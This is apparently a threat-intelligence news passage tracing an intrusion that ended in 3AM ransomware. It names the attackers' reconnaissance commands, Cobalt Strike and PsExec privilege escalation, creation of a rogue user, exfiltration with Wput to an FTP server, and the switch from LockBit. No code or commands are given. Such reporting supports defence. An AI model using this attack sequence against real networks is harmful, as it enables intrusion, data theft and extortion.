Diving in details
- It begins with the use of the gpresult command to retrieve the policy settings for a particular user system.
- Additionally, actors deployed several components of Cobalt Strike and attempted to gain higher privileges on the computer utilizing PsExec.
- Subsequently, they executed commands such as whoami, netstat, quser, and net share for reconnaissance purposes.
- To ensure persistence, they created a new user and employed the Wput tool to transmit the victims’ files to their FTP server.
- In the final stage, when LockBit was blocked in the first attempt, the attackers resorted to the 3AM ransomware that was deployed on three systems on the organization’s network.
Written in Rust language, the 3AM ransomware gets its name from the fact that it appends encrypted files with the .threeamtime extension. Additionally, the ransom text mentions the ransomware’s name.
The ransomware is currently being used in limited attacks. Its exact origins remain unknown. However, the fact that 3AM ransomware was used as a fallback by a LockBit affiliate suggests that it may attract the interest of other attackers and could be seen in more attacks in the future.